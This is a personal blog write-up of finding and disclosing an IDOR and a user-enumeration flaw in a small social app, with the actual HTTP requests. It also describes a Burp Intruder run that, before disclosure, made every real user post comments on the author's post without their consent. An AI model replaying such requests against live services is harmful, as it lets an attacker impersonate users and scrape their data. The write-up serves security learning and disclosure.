In this blog post, I’ll take you on my first time journey into the world of mobile application security through a bizarre yet real app called The Social Nedwork, a niche social media platform where only people named Ned can post. Armed with curiosity, an old iPhone, and minimal prior experience, I discovered vulnerabilities, responsibly disclosed them, and learned an incredible amount along the way.
This adventure started an unassuming Thursday evening when I came home from work to find my family hanging out. I walked through the door to hear my cousin say, “Ned, I’ve got the app for you!” Confused, I opened the App Store to discover the majesty of the Social Nedwork.
The Nedwork is a Twitter clone who’s tagline reads:
“Are you a Ned who never really felt like you had a place to share your thoughts? Or a non-Ned who felt out of touch with what Neds are talking about? Worry no more! The Social Nedwork is the new revolutionary social app where only Neds can post! You need to be a verified Ned to post, but all users can like, comment, and just generally hang out on the Social Nedwork.”
Amused, I registered an account and immeadiately my spidy senses started tingling.
HTTP Request:
GET /profile/self_details HTTP/2
Host: social-nedwork.onrender.com
[TRUNCATED]
HTTP Response:
HTTP/2 200 OK
[TRUNCATED]
{
"id":"57a301f4-7c75-4694-a70a-81b2b249f457",
"updated_at":"2025-03-08T14:31:12.615Z",
"username":"57a301f4-7c75-4694-a70a-81b2b249f457",
"full_name":"nedpfeiffer",
[TRUNCATED]
}
By default, newly created accounts had their username set to a randomized GUID, shown in the previous HTTP request and response but also visible in the app UI. I got the sense that the application was likely vibe coded with AI, and that typically means authorization vulnerabilities.
After exploring the app functionality a bit I got intriged by the comment feature.
HTTP Request:
POST /comments/post_comment HTTP/2
Host: social-nedwork.onrender.com
[TRUNCATED]
{
"postId":"2a6755ba-c5ee-401a-b9bb-11593cf8f5cd",
"userId":"f864964a-3b0c-4e7d-bb48-7adc433ec543",
"content":"Couldn’t have put it better myself"
}
HTTP Response:
HTTP/2 200 OK
[TRUNCATED]
{
"id":"135ac9b3-9304-4245-8482-1a482464584b",
"created_at":"2025-03-08T16:49:36.035Z",
"user_id":"f864964a-3b0c-4e7d-bb48-7adc433ec543",
"post_id":"2a6755ba-c5ee-401a-b9bb-11593cf8f5cd",
"content":"Couldn’t have put it better myself",
"reply_comment_id":null,
"user":{
"id":"f864964a-3b0c-4e7d-bb48-7adc433ec543",
"username":"f864964a-3b0c-4e7d-bb48-7adc433ec543",
"avatar_url":"https://storage.googleapis.com/nedwork_storage/assets/default_profile_pic.webp"
}
}
The comment passes a userId parameter in the POST request body which seemed unnecessary, as the app should be able to use my JWT session token to attribute me as the commenting user. What if we created a second account and then impersonated our original account by passing our original userId in the request?
HTTP Request:
POST /comments/post_comment HTTP/2
Host: social-nedwork.onrender.com
[TRUNCATED]
{"postId":"2a6755ba-c5ee-401a-b9bb-11593cf8f5cd","userId":"57a301f4-7c75-4694-a70a-81b2b249f457","content":"Insecure direct object reference (IDOR) is a type of access control vulnerability in digital security. This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication. "}
HTTP Response:
HTTP/2 200 OK
[TRUNCATED]
{
"id":"0b43f656-80aa-4e09-aa64-fff6d85a6ba2",
"created_at":"2025-03-08T16:53:42.982Z",
"user_id":"57a301f4-7c75-4694-a70a-81b2b249f457",
"post_id":"2a6755ba-c5ee-401a-b9bb-11593cf8f5cd",
"content":"Insecure direct object reference (IDOR) is a type of access control vulnerability in digital security. This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication.",
"reply_comment_id":null,"user":{
"id":"57a301f4-7c75-4694-a70a-81b2b249f457",
"username":"nedpfeiffer",
"avatar_url":"https://storage.googleapis.com/nedwork_storage/assets/default_profile_pic.webp"
}
}
Uh oh. As suspected, the userId parameters is susceptible to IDOR, allowing me to impersonate any user including the admin. Typically this is where I would stop and notify the vendor, but because the creator was a family friend I decided to have a little fun.
I’d spent a good chunk of the weekend proxying and modifying requests to this obscure mobile app and I was getting pretty lonely. Let’s make myself the most popular Ned on the Social Nedwork!
Well first we need to somehow enumerate the UUIDs of every other user on the app. Forunately for us, the search functionality allows us to do just that.
HTTP Request:
GET /search/profiles?user_id=57a301f4-7c75-4694-a70a-81b2b249f457&page_size=10000&page_number=1 HTTP/2
Host: social-nedwork.onrender.com
[TRUNCATED]
HTTP Response:
HTTP/2 200 OK
[TRUNCATED]
[
{
"id":"066934d4-b3f0-4e21-acf1-4cb5d3da6aaf",
"updated_at":null,
"username":"066934d4-b3f0-4e21-acf1-4cb5d3da6aaf",
"full_name":"[REDACTED]",
"avatar_url":"https://storage.googleapis.com/nedwork_storage/assets/default_profile_pic.webp",
"bio":null,
"ned_status":"NON_NED",
"verification_hash":"124d91bc366372fcf53472eb2714abad33722a0112c75ac84803c293ee796201",
"following_count":"1",
"followers_count":"1",
"is_following":false},
{
"id":"3560f44e-41c8-4d51-9055-23bef6e7e69c",
"updated_at":null,
"username":"3560f44e-41c8-4d51-9055-23bef6e7e69c",
"full_name":"[REDACTED]",
"avatar_url":"https://storage.googleapis.com/nedwork_storage/assets/default_profile_pic.webp",
"bio":null,
"ned_status":null,
"verification_hash":null,
"following_count":"0",
"followers_count":"0",
"is_following":false
},
[TRUNCATED]
{
"id":"2358d7d3-2431-4c88-85c0-87c76f4900fd",
"updated_at":"2025-03-06T21:53:05.583Z",
"username":"red_ned_redemption",
"full_name":"Red Ned Redemption ",
"avatar_url":"https://storage.googleapis.com/nedwork_storage/avatars/1741297983184_a98f2edd-b077-432d-851d-a7320c2a2cb5.jpg",
"bio":"",
"ned_status":null,
"verification_hash":null,
"following_count":"1",
"followers_count":"1",
"is_following":false
}
]
After modifying page_size parameter I can see every user on the app and scrape a list of userIds. Then after a simple Burp Intruder Pitchfork attack, I can make everyone comment on how funny my inaugural post on the Social Nedwork is.
Intruder List:
That's so true!!
Omg relatable
ur so funny haha
imagine not being named Ned that'd be crazy
hahaha lmaooo
literally me fr
nahhh that's wild
stopppp u got me crying
omg u did NOT just say that
bro what
too real omg
i can't even rn
this took me OUT
nah bc why is this so accurate
screamingggg lmao
im in tears rn
no thoughts, just vibes
deadass tho
not u calling me out like this
bro u got me wheezing
why is this me lmao
Intruder Payload Positions:
POST /comments/post_comment HTTP/2
Host: social-nedwork.onrender.com
[TRUNCATED]
{
"postId":"2a6755ba-c5ee-401a-b9bb-11593cf8f5cd",
"userId":"&fd9023b2-0be0-443c-a478-32f25b242114&",
"content":"&So true bestie!&"
}
And just like that, I was viral micro celebrity on the Social Nedwork.
After I had my fun, I called the creator and walked him through everything: the IDOR on userId, the ability to enumerate account information, and a handful of other low severity findings. What stuck with me is how ordinary the bugs were. No debuggers. No reverse engineering. Just intercepting traffic, asking “what happens if I change this?”, and seeing the server say “sure.”
My first dive into mobile app security started as a joke about a social network for Neds. It ended with a responsible disclosure, a fixed API, and a much better understanding of how often real vulnerabilities come down to fundamentals.